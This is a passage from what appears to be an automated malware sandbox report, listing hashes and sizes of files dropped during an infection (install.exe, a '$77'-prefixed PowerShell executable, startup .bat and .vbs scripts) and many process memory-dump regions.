                                                                                                                              1e4e7795327c95ed3beb3f011a4596d7

                                                                                                                              SHA1

                                                                                                                              4fa407c07aeedf34a55e6ff08935cb71afa11496

                                                                                                                              SHA256

                                                                                                                              cd78b6b0f1d7e2c13439b466bfa00e992c774ba5335f90bb616557298c193282

                                                                                                                              SHA512

                                                                                                                              dea17b69d0aa0e943eb005a2cbc9a8e29edff37a4b815f90bfe396a6271c027c352afbae1e484cc4ad90f6e40165dc8f89daebf5f39e3bcf27c5393642fdc519

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dblcuafh.fn2.ps1
                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                              Filesize

                                                                                                                              162KB

                                                                                                                              MD5

                                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                              SHA1

                                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                              SHA256

                                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                              SHA512

                                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                            • C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
                                                                                                                              Filesize

                                                                                                                              411KB

                                                                                                                              MD5

                                                                                                                              bc4535f575200446e698610c00e1483d

                                                                                                                              SHA1

                                                                                                                              78d990d776f078517696a2415375ac9ebdf5d49a

                                                                                                                              SHA256

                                                                                                                              88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

                                                                                                                              SHA512

                                                                                                                              a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

                                                                                                                            • C:\Users\Admin\AppData\Roaming\startup_str_212.bat
                                                                                                                              Filesize

                                                                                                                              515KB

                                                                                                                              MD5

                                                                                                                              4c2a3be3d5c9464eb441677e41f44fd8

                                                                                                                              SHA1

                                                                                                                              c826034a0882d21a39056d745e88622ee9698343

                                                                                                                              SHA256

                                                                                                                              45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

                                                                                                                              SHA512

                                                                                                                              ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

                                                                                                                            • C:\Users\Admin\AppData\Roaming\startup_str_212.vbs
                                                                                                                              Filesize

                                                                                                                              115B

                                                                                                                              MD5

                                                                                                                              1eca98cf5780cf222d7eec0fb8789ae4

                                                                                                                              SHA1

                                                                                                                              ede80058e543dc3346c371183273277d4821b21f

                                                                                                                              SHA256

                                                                                                                              dbea5a630c3a6f2bd856a3dacb5e935fe517ef75f8439a8bad172a5343aa3229

                                                                                                                              SHA512

                                                                                                                              6430f17a271b964b305ee230cab6067d58389d152a1433a6098e17b3d8ffbf3fdfeceacd3a447a68badd6e0ac96c2fe244f9b6e23ffdd75e8c5eb456cca82ab3

                                                                                                                            • memory/428-160-0x000002BC21150000-0x000002BC2117B000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/428-161-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/428-154-0x000002BC21150000-0x000002BC2117B000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/536-165-0x000002576AF90000-0x000002576AFBB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/608-119-0x0000023A09C50000-0x0000023A09C75000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              148KB

                                                                                                                            • memory/608-120-0x0000023A09C80000-0x0000023A09CAB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/608-121-0x0000023A09C80000-0x0000023A09CAB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/608-127-0x0000023A09C80000-0x0000023A09CAB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/608-128-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/688-139-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/688-138-0x000001ACDF5C0000-0x000001ACDF5EB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/688-132-0x000001ACDF5C0000-0x000001ACDF5EB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/980-143-0x000001F02B5D0000-0x000001F02B5FB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/980-150-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/980-149-0x000001F02B5D0000-0x000001F02B5FB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/1004-95-0x0000000006A60000-0x0000000006AA6000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              280KB

                                                                                                                            • memory/1172-115-0x00007FFFCE9E0000-0x00007FFFCEA9D000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              756KB

                                                                                                                            • memory/1172-111-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/1172-113-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/1172-114-0x00007FFFCF4E0000-0x00007FFFCF6E9000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/1172-110-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/1172-109-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/1172-108-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/1172-116-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/1904-107-0x00007FFFCE9E0000-0x00007FFFCEA9D000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              756KB

                                                                                                                            • memory/1904-106-0x00007FFFCF4E0000-0x00007FFFCF6E9000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/1904-105-0x00000256D5440000-0x00000256D546A000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              168KB

                                                                                                                            • memory/1904-96-0x00000256D50B0000-0x00000256D50D2000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/2812-73-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/2812-23-0x00000000098F0000-0x0000000009E96000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              5.6MB

                                                                                                                            • memory/2812-1-0x0000000005140000-0x0000000005176000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              216KB

                                                                                                                            • memory/2812-3-0x0000000005900000-0x0000000005F2A000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              6.2MB

                                                                                                                            • memory/2812-2-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/2812-0-0x000000007516E000-0x000000007516F000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/2812-4-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/2812-5-0x0000000005720000-0x0000000005742000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/2812-7-0x0000000005F30000-0x0000000005F96000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/2812-6-0x00000000057C0000-0x0000000005826000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/2812-16-0x0000000005FE0000-0x0000000006337000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/2812-17-0x00000000064F0000-0x000000000650E000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              120KB

                                                                                                                            • memory/2812-18-0x0000000006570000-0x00000000065BC000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/2812-19-0x0000000007CC0000-0x000000000833A000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              6.5MB

                                                                                                                            • memory/2812-20-0x0000000007640000-0x000000000765A000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              104KB

                                                                                                                            • memory/2812-21-0x0000000002B60000-0x0000000002B68000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/2812-22-0x0000000007730000-0x0000000007792000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              392KB

                                                                                                                            • memory/4948-50-0x0000000006E90000-0x0000000006E9A000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              40KB

                                                                                                                            • memory/4948-49-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/4948-26-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/4948-27-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/4948-37-0x0000000071350000-0x000000007139C000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/4948-47-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/4948-48-0x0000000006B20000-0x0000000006BC4000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              656KB

                                                                                                                            • memory/4948-46-0x0000000006040000-0x000000000605E000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              120KB

                                                                                                                            • memory/4948-36-0x0000000006AE0000-0x0000000006B14000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              208KB

                                                                                                                            • memory/4948-25-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/4948-55-0x0000000075160000-0x0000000075911000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              7.7MB

                                                                                                                            • memory/4948-51-0x00000000070A0000-0x0000000007136000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              600KB

                                                                                                                            • memory/4948-52-0x0000000007030000-0x0000000007041000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              68KB

                                                                                                                            • memory/5020-75-0x0000000007990000-0x0000000007A22000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              584KB

                                                                                                                            • memory/5020-74-0x00000000053F0000-0x000000000545C000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              432KB

                                                                                                                            • memory/5020-77-0x0000000007C80000-0x0000000007CBC000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              240KB

                                                                                                                            • memory/5020-76-0x0000000007910000-0x0000000007922000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              72KB